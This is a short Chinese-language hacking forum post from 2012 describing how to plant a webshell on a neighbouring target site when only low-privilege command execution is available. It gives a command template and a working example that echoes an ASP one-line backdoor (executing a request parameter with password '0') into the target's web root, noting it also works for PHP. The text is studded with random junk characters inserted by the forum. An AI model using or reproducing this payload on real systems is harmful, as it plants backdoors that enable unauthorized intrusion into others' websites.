中国网络渗透测试联盟

标题: 旁注cmd低权限下拿webshell [打印本页]
作者: admin    时间: 2012-9-23 14:40
标题: 旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。2 K# u8 l; R, B' e, L; v3 M( k

) K3 r! a7 _4 m2 g# ]命令格式
4 _# O& E* }& k. U1 p
* Q8 ~" d+ t  g( l% a1 S8 vEcho 语句 >目标站绝对目录
/ u0 n/ z6 b7 A$ ]" C6 s; Q9 @$ C$ d% f( ?- a( H3 b
例如:
7 }! d2 n% h4 l: V7 `9 J
% U, o% N4 D2 gecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
# M0 a  A3 w9 ~- G- ], Z" m9 n9 a$ e/ Q+ n" }
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。+ z, `7 Z. |: f$ C2 e* s! H




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2